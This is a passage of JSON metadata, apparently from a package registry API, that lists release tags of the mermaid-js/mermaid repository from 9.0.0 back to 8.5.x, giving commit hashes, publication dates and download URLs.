ad.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyst